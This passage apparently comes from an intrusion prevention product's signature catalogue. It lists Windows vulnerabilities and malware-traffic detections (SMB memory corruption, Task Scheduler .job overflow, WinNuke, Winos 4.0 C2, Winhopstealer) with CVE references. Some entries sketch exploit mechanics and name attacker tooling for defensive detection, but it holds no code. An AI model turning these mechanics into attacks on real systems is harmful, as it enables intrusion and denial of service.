Description: Improper validation of messages sent to the Remote Desktop Licensing service causes a vulnerability in Windows. A successful exploitation allows an attacker to gain access to information on the target system.
Situation: MSRPC-TCP_CPS-Windows-Remote-Desktop-Licensing-Service-Information-Disclosure-Vulnerability
References:
CVE-2024-38258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38258
Back to top

Windows-Remote-Desktop-Services-Remote-Code-Execution-CVE-2025-27480

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Platform: Windows
Software: <os>
Type: Race Condition
Description: Windows Remote Desktop Service's remote code execution vulnerability CVE-2025-27480.
Situation: Generic_UDP-DTLS-ClientHello-Request
References:
CVE-2025-27480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27480
ms25-apr
http://technet.microsoft.com/security/bulletin/ms25-apr
Back to top

Windows-Remote-Directory-Listing

About this vulnerability: Detects Windows Directory Listing
Risk: Moderate
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Any Software
Type: Post Compromise Behaviour
Description: Summary: A string "Volume Serial Number" is seen when directory listing command "dir" is executed within windows shell. This might be post-compromise behaviour - a remote attacker has compromised the host and wants to see the directory contents.
Situation: Shared_Windows-Volume-Response-Detect-2
Shared_Windows-Unicode-Volume-Response-Detect-2
Back to top

Windows-Remote-Management-Activity

About this vulnerability: Windows Remote Management activity was detected
Risk: Moderate
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Windows Remote Management activity was detected. In addition to normal administration activities, this kind of activity might indicate ongoing lateral movement in the infrastructure.
Situation: HTTP_CS-Windows-Remote-Management-Activity
Back to top

Windows-RPC-Locator-BOF-MS03-001

About this vulnerability: RPC Locator buffer overflow (MS03-001)
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0; Windows 2000; Windows XP
Software: RPC Locator
Type: Buffer Overflow
Description: Remote Procedure Call (RPC) Locator service suffers from a buffer overflow that can lead to code execution. Searching for an entry name makes a call to the unsafe wcscpy function, which if passed a long string, causes the buffer overflow. The vulnerable Locator Service is running by default on Windows NT and 2000 Domain Controllers.
Situation: MSRPC-TCP_CPS-Rpc445-Locator-BOF-MS03-001
References:
CVE-2003-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0003
BID-6666
http://www.securityfocus.com/bid/6666
MS03-001
http://technet.microsoft.com/security/bulletin/MS03-001
Back to top

Windows-RSH-Daemon-Buffer-Overflow

About this vulnerability: A vulnerability in Windows RSH Daemon
Risk: High
First detected in: sgpkg-ips-485-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows RSH Daemon
Type: Input Validation
Description: There is a stack-based buffer overflow in Windows RSH Daemon.
Situation: RSH_CS-Windows-RSH-Daemon-Buffer-Overflow
References:
CVE-2007-4006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4006
BID-24044
http://www.securityfocus.com/bid/24044
Back to top

Windows-Schannel-Denial-Of-Service-CVE-2023-21818

About this vulnerability: A vulnerability in Windows Schannel
Risk: Moderate
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Schannel is a Security Support Provider (SSP) that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) Internet standard authentication protocols in Windows. An out-of-bound read vulnerability has been identified in Schannel, which could be exploited to achieve remote information disclosure or denial-of-service.
Situation: TLS_SS-Windows-Schannel-Denial-Of-Service-CVE-2023-21818
References:
CVE-2023-21818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21818
ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb
Back to top

Windows-Schannel-Denial-Of-Service-Vulnerability-CVE-2023-21819

About this vulnerability: An attempt to exploit a vulnerability in Schannel detected
Risk: High
First detected in: sgpkg-ips-1556-5242
Last changed: sgpkg-ips-1557-5242
Platform: Windows
Software: LSASS
Type: Resource Starvation
Description: Schannel is a Security Support Provider (SSP) that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) Internet standard authentication protocols in Windows. An out-of-bound read vulnerability has been identified in Schannel, which could be exploited to achieve remote information disclosure or denial-of-service.
Situation: TLS_CS_Windows-Schannel-Denial-Of-Service-Vulnerability-CVE-2023-21819
References:
CVE-2023-21819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21819
ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb
Back to top

Windows-Script-File-Transfer

About this vulnerability: A transfer of a Windows Script File (WSF) detected
Risk: High
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Windows Script File (WSF) has been commonly used by malicious actors to distribute malware onto victims' computers. Thus, by blocking such file, we effectively reduce one malware infection vector.
Situation: File-Member-Name_Windows-Script-File-Transfer
File-Name_Windows-Script-File-Transfer
Back to top

Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3205

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1336-5242
Platform: Windows Vista; Windows 2008; Windows 2008 R2
Software: Internet Explorer
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: File-Text_Windows-Scripting-Engine-Memory-Corruption
References:
CVE-2016-3205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3205
MS16-069
http://technet.microsoft.com/security/bulletin/MS16-069
Back to top

Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3206

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1336-5242
Platform: Windows Vista; Windows 2008; Windows 2008 R2
Software: Internet Explorer
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: File-Text_Windows-Scripting-Engine-Memory-Corruption
References:
CVE-2016-3206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3206
MS16-069
http://technet.microsoft.com/security/bulletin/MS16-069
Back to top

Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3207

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 2008; Windows 2008 R2
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: File-Text_Windows-Scripting-Engine-Memory-Corruption
References:
CVE-2016-3207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3207
MS16-069
http://technet.microsoft.com/security/bulletin/MS16-069
Back to top

Windows-Scripting-Engine-Memory-Corruption-CVE-2018-8552

About this vulnerability: A vulnerability in Windows Scripting Engine
Risk: High
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists an information disclosure vulnerability in the Microsoft Windows VBScript engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Windows-Scripting-Engine-Memory-Corruption-CVE-2018-8552
References:
CVE-2018-8552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8552
ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov
Back to top

Windows-Scripting-Languages-Remote-Code-Execution-CVE-2022-41118

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-1524-5242
Last changed: sgpkg-ips-1524-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Windows detected.
Situation: File-Text_Windows-Scripting-Languages-Remote-Code-Execution-CVE-2022-41118
References:
CVE-2022-41118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41118
ms22-nov
http://technet.microsoft.com/security/bulletin/ms22-nov
Back to top

Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists an out-of-bounds vulnerability in Windows Search Service.
Situation: SMB-TCP_Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543
SMB-TCP_Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543-2
References:
CVE-2017-8543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8543
ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun
Back to top

Windows-Secure-Channel-Denial-Of-Service-CVE-2024-38148

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1763-5242
Last changed: sgpkg-ips-1763-5242
Platform: Windows
Software: LSASS
Type: Input Validation
Description: An unauthenticated denial-of-service (DoS) in the Local Security Authority Subsystem Service (LSASS) has been identified that can lead to remote DoS of Windows systems.
Situation: TLS_CS-Windows-Secure-Channel-Denial-Of-Service-CVE-2024-38148
References:
CVE-2024-38148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38148
ms24-aug
http://technet.microsoft.com/security/bulletin/ms24-aug
Back to top

Windows-Services-NFS-ONCRPC-Xdr-Driver-Information-Disclosure-CVE-2022-21993

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Low
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Microsoft Windows Server for NFS. The vulnerability is caused by improper handling of NFS requests. A remote attacker can exploit the vulnerability by sending a malicious NFS request to the target server. Successful exploitation could result in information disclosure conditions.
Situation: SunRPC_TCP-Windows-Services-NFS-ONCRPC-Xdr-Driver-Information-Disclosure-CVE-2022-21993
References:
CVE-2022-21993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21993
Back to top

Windows-Shell-Remote-Code-Execution-Vulnerability-CVE-2018-8495

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Windows-Shell-Remote-Code-Execution-Vulnerability-CVE-2018-8495
References:
CVE-2018-8495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8495
ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct
Back to top

Windows-Shell-Shortcut-Arbitrary-Code-Execution

About this vulnerability: Vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-323-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Windows Shell, a component of Microsoft Windows.
Situation: HTTP_SS-Windows-Shell-Shortcut-Arbitrary-Code-Execution
SMB-TCP_FR-Windows-Shell-Shortcut-Arbitrary-Code-Execution
SMB-TCP_FW-Windows-Shell-Shortcut-Arbitrary-Code-Execution
File-Binary_Windows-Shell-Shortcut-Arbitrary-Code-Execution
File-Binary_Windows-LNK-File-Transfer
File-Binary_Windows-Control-Panel-Applet-Shortcut-File-Transfer
References:
CVE-2010-2568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568
BID-41732
http://www.securityfocus.com/bid/41732
MS10-046
http://technet.microsoft.com/security/bulletin/MS10-046
Back to top

Windows-SMB-Client-Response-Parsing-Vulnerability-CVE-2011-0660

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows XP; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: There is a vulnerability in SMB message parsing.
Situation: SMB-TCP_Windows-SMB-Client-Response-Parsing-Vulnerability-CVE-2011-0660
References:
CVE-2011-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0660
BID-47239
http://www.securityfocus.com/bid/47239
OSVDB-71772
http://www.osvdb.org/71772
MS11-019
http://technet.microsoft.com/security/bulletin/MS11-019
Back to top

Windows-SMB-Denial-Of-Service-Vulnerability-CVE-2024-43642

About this vulnerability: A vulnerability in Windows
Risk: Moderate
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper handling of SMB protocol negotiation messages causes a vulnerability in Windows.
Situation: SMB-TCP_CHS-Windows-SMB-Denial-Of-Service-Vulnerability-CVE-2024-43642
References:
CVE-2024-43642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43642
Back to top

Windows-SMB-Open2-Request-Error-Handling-Memory-Corruption

About this vulnerability: Microsoft Windows SMB Server Trans2 Open2 Memory Corruption
Risk: High
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A memory corruption vulnerability exists in Microsoft Windows SMB services. The flaw is due to insufficient input validation when handling a SMB TRANS2 request. Remote authenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System level privileges. In an attack case where code injection is not successful, an attacked system will encounter an unrecoverable system error and display the Blue Screen of Death (BSoD). The target will halt or restart based on the configuration of system failure event handling. If the system is halted, it must be restarted manually by an administrator. In a more sophisticated attack, where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the System (Ring 0).
Situation: SMB-TCP_CHS-Open2-Buffer-Overflow-MS09-001-1
SMB-TCP_CHS-Open2-Buffer-Overflow-MS09-001-2
References:
CVE-2008-4835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4835
BID-33122
http://www.securityfocus.com/bid/33122
MS09-001
http://technet.microsoft.com/security/bulletin/MS09-001
Back to top

Windows-SMB-Remote-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in SMBv2 server.
Situation: SMB-TCP_Windows-SMB-Remote-Code-Execution-Vulnerability
References:
CVE-2019-0630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0630
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Windows-SMB-Trans-Request-Error-Handling-Memory-Corruption

About this vulnerability: Microsoft Windows SMB Server Trans Request Error Handling Memory Corruption
Risk: High
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A memory corruption vulnerability exists in Microsoft Windows SMB services. The flaw is due to insufficient input validation when handling SMB transactions. Remote authenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System level privileges. In an attack case where code injection is not successful, an attacked system will encounter an unrecoverable system error and display the Blue Screen of Death (BSoD). The target will halt or restart based on the configuration of system failure event handling. If the system is halted, it must be restarted manually by an administrator. In a more sophisticated attack, where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the System level.
Situation: SMB-TCP_CHS-Transaction-Buffer-Overflow-MS09-001
SMB-TCP_CHS-Transaction-Buffer-Overflow-MS09-001-2
References:
CVE-2008-4834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4834
BID-33121
http://www.securityfocus.com/bid/33121
MS09-001
http://technet.microsoft.com/security/bulletin/MS09-001
Back to top

Windows-Smbexec-Service-Create-Start-Command-Execution

About this vulnerability: Command execution by means of creating and starting multiple Windows services with crafted commands
Risk: Moderate
First detected in: sgpkg-ips-1519-5242
Last changed: sgpkg-ips-1519-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: This detects attempts of command execution by means of creating and starting multiple Windows services with crafted commands
Situation: MSRPC-TCP_CPS-Windows-Smbexec-Service-Create-Start-Command-Execution
Back to top

Windows-Task-Scheduler-Job-File-System-Compromise

About this vulnerability: Viewing directories with invalid .job files allows arbitrary code execution
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Task Scheduler
Type: Malfunction
Description: Both explorer.exe and iexplore.exe parse .job files when showing them in a directory listing. The "to be executed" field is passed to wcscpy without bounds checking while parsing a .job files, allowing attackers to cause a buffer overflow and execute arbitrary code. A remote attack requires the victim to browse a directory that contains the malicious .job file.
Situation: HTTP_SS-Windows-Task-Scheduler-Job-File-System-Compromise
SMB-TCP_FR-Windows-Task-Scheduler-Job-File-System-Compromise
SMB-TCP_FW-Windows-Task-Scheduler-Job-File-System-Compromise
File-Binary_Windows-Task-Scheduler-Job-File-System-Compromise
References:
CVE-2004-0212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0212
BID-10708
http://www.securityfocus.com/bid/10708
MS04-022
http://technet.microsoft.com/security/bulletin/MS04-022
Back to top

Windows-TCP-IP-Remote-Code-Execution-CVE-2024-38063

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1764-5242
Last changed: sgpkg-ips-1764-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Windows TCP/IP stack's remote code execution vulnerability.
Situation: IPv6_Extension-headers-incomplete
IPv6_Atomic-Fragment
References:
CVE-2024-38063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38063
ms24-aug
http://technet.microsoft.com/security/bulletin/ms24-aug
Back to top

Windows-Telnet-Service-Buffer-Overflow-Vulnerability-CVE-2015-0014

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-624-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows Telnet service
Situation: Telnet_CS-Windows-Telnet-Service-Buffer-Overflow-Vulnerability-CVE-2015-0014
References:
CVE-2015-0014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0014
MS15-002
http://technet.microsoft.com/security/bulletin/MS15-002
Back to top

Windows-Theme-API-Remote-Code-Execution-Vulnerability-CVE-2018-8413

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists an input validation vulnerability in Microsoft Windows. A remote attacker can use this vulnerability to execute arbitrary code on the affected system.
Situation: File-Binary_Windows-Theme-API-Remote-Code-Execution-Vulnerability-CVE-2018-8413
References:
CVE-2018-8413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8413
ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct
Back to top

Windows-Theme-File-Remote-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-542-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: File-Text_Windows-Theme-File-Remote-Code-Execution-Vulnerability
References:
CVE-2013-0810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0810
MS13-071
http://technet.microsoft.com/security/bulletin/MS13-071
Back to top

Windows-Theme-File-VisualStyles-SMB-Path

About this vulnerability: Windows Theme file with a VisualStyles SMB path
Risk: Moderate
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: An attempt to exploit a vulnerability in Windows Theme File SMB Path detected.
Situation: File-Text_Windows-Theme-File-VisualStyles-SMB-Path
Back to top

Windows-URL-Zone-Check-Bypass-CVE-2023-29324

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1585-5242
Last changed: sgpkg-ips-1585-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Windows URL zone check bypass vulnerability.
Situation: File-Binary_Windows-URL-Zone-Check-Bypass-CVE-2023-29324
File-OLE_Windows-URL-Zone-Check-Bypass-CVE-2023-29324
References:
CVE-2023-29324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29324
ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may
Back to top

Windows-URL-Zone-Check-Bypass-CVE-2023-35384

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1619-5242
Last changed: sgpkg-ips-1619-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Windows URL zone check bypass vulnerability.
Situation: File-Binary_Windows-URL-Zone-Check-Bypass-CVE-2023-35384
File-OLE_Windows-URL-Zone-Check-Bypass-CVE-2023-35384
References:
CVE-2023-35384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35384
ms23-aug
http://technet.microsoft.com/security/bulletin/ms23-aug
Back to top

Windows-VBScript-Engine-Remote-Code-Execution-CVE-2018-8544

About this vulnerability: A vulnerability in Windows VBScript Scripting Engine
Risk: High
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a use after free vulnerability in Windows VBScript Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Windows-VBScript-Engine-Remote-Code-Execution-CVE-2018-8544
References:
CVE-2018-8544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8544
ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov
Back to top

Windows-VBScript-Engine-Remote-Code-Execution-Vulnerability-CVE-2018-8625

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Windows-VBScript-Engine-Remote-Code-Execution-Vulnerability-CVE-2018-8625
References:
CVE-2018-8625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8625
ms18-dec
http://technet.microsoft.com/security/bulletin/ms18-dec
Back to top

Windows-Visual-Studio-Code-Git-Extension-Argument-Injection

About this vulnerability: A vulnerability in Microsoft Visual Studio Code
Risk: High
First detected in: sgpkg-ips-1506-5242
Last changed: sgpkg-ips-1506-5242
Platform: Windows
Software: Microsoft Visual Studio Code
Type: Input Validation
Description: An argument injection vulnerability exists in the Git Extension of Windows Visual Studio Code. The vulnerability is due to improper input validation of URL handlers. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted URL in Visual Studio Code. Successful exploitation results in the execution of arbitrary code under the security context of the target user.
Situation: File-Text_Windows-Visual-Studio-Code-Git-Extension-Argument-Injection
References:
CVE-2022-30129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30129
Back to top

Windows-Visual-Studio-Code-Jupyter-Notebook-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Visual Studio Code
Risk: Moderate
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Platform: Windows
Software: Microsoft Visual Studio Code
Type: Input Validation
Description: Improper input validation of .ipynb files causes a remote code execution vulnerability in Microsoft Visual Studio Code. A successful exploit allows an attacker to execute arbitrary code with the privileges of the affected user.
Situation: File-Text_Windows-Visual-Studio-Code-Jupyter-Notebook-Remote-Code-Execution
References:
CVE-2022-41034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41034
Back to top

Windows-Windows-PPTP-Protocol-CVE-2022-21972-Use-After-Free-Vulnerability

About this vulnerability: A vulnerability in the Microsoft Windows VPN component.
Risk: High
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in the Microsoft Windows VPN component, in multiple Microsoft Windows versions, which allows remote attackers to execute arbitrary code by sending crafted requests, due to improper handling of PPTP packets.
Situation: PPTP_Windows-PPTP-Protocol-CVE-2022-21972-Use-After-Free-Vulnerability
References:
CVE-2022-21972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21972
Back to top

Windows-WPAD-Proxy-Discovery-Elevation-Of-Privilege-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista SP2; Windows 2008; Windows 7 SP1; Windows 2008 R2; Windows 8.1; Windows 2012; Windows 2012 R2; Windows RT 8.1; Windows 10.1511; Windows 10.0
Software: <os>
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge.
Situation: NetBIOS-UDP_Windows-WPAD-Proxy-Discovery-Elevation-Of-Privilege-Vulnerability
References:
CVE-2016-3236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3236
MS16-077
http://technet.microsoft.com/security/bulletin/MS16-077
Back to top

Windows_Xp_2003_Land_Attack_DoS

About this vulnerability: Windows XP and 2003 land attack Denial of Service
Risk: Low
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP2; Windows 2003
Software: <os>
Type: Buffer Overflow
Description: Windows XP SP2 and Windows 2003 suffer from a denial of service vulnerability when receiving spoofed SYN packets from their own address.
Situation: DOS_LAND
References:
CVE-2005-0688
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0688
MS06-064
http://technet.microsoft.com/security/bulletin/MS06-064
MS05-019
http://technet.microsoft.com/security/bulletin/MS05-019
Back to top

WinFTP-Nlst-Denial-of-Service

About this vulnerability: A WinFTP Nlst Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Win FTP Server
Type: Malfunction
Description: A vulnerability in WinFTP Server, version 2.3.0, which allows remote attackers to cause a denial of service condition via an invalid NLST command.
Situation: FTP_CS-Oversized-Nlst-Argument
References:
CVE-2008-5666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5666
OSVDB-49043
http://www.osvdb.org/49043
Back to top

Winhopstealer-Trojan

About this vulnerability: Winhopstealer Trojan
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Winhopstealer trojan traffic.
Situation: Generic_CS-Winhopstealer-Trojan
Back to top

WinNuke-DoS

About this vulnerability: WinNuke DoS attack
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows NT 3.5; Windows NT 4.0 SP0; Windows NT 4.0 SP1; Windows NT 4.0 SP2; Windows NT 4.0 SP3; SCO
Software: <os>
Type: Malfunction
Description: Older versions of Microsoft Windows and SCO Open Server 5.0 have a vulnerability in the handling of "Out of Band" data in TCP/IP. This gives a remote attacker an opportunity for a denial of service (DoS) attack, as the target system crashes or loses the network connection.
Situation: DOS_WINNUKE
References:
CVE-1999-0153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0153
BID-2010
http://www.securityfocus.com/bid/2010
OSVDB-1666
http://www.osvdb.org/1666
Back to top

Winos4.0-Post-Exploitation-Framework-C2-Traffic

About this vulnerability: Winos 4.0 post exploitation framework command and control traffic
Risk: High
First detected in: sgpkg-ips-1801-5242
Last changed: sgpkg-ips-1801-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Winos 4.0 is a post-exploitation framework with various command and control capabilities.
Situation: Generic_CS-Winos4.0-Post-Exploitation-Framework-C2-Traffic
Back to top

WinRadius-User-Password-Option-Size-Validation-Buffer-Overflow

About this vulnerability: A vulnerability in WinRadius
Risk: Moderate
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WinRadius
Type: Input Validation
Description: There exists a denial of service vulnerability in WinRadius. The vulnerability is caused by the failure of WinRadius to validate the User-Password option size when parsing RADIUS Access-Requests. A remote attacker can exploit the vulnerability by a sending specially crafted RADIUS request to the target server, potentially causing a denial of service.
Situation: Generic_UDP-WinRadius-User-Password-Option-Size-Validation-Buffer-Overflow
References:
CVE-2012-3816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3816
BID-53702
http://www.securityfocus.com/bid/53702
Back to top

WINS-Buffer-Overflow-2-MS09-039

About this vulnerability: Buffer overflow vulnerability in WINS
Risk: Moderate
First detected in: sgpkg-ips-237-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows 2003
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Windows Internet Name Service (WINS) on Windows 2000/2003.
Situation: WINS_Buffer-Overflow-2-MS09-039
References:
CVE-2009-1924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1924
MS09-039
http://technet.microsoft.com/security/bulletin/MS09-039
Back to top

WINS-Buffer-Overflow-MS09-039

About this vulnerability: Buffer overflow vulnerability in WINS
Risk: Moderate
First detected in: sgpkg-ips-237-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows 2003
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Windows Internet Name Service (WINS) on Windows 2000/2003.
Situation: WINS_Buffer-Overflow-MS09-039
References:
CVE-2009-1923
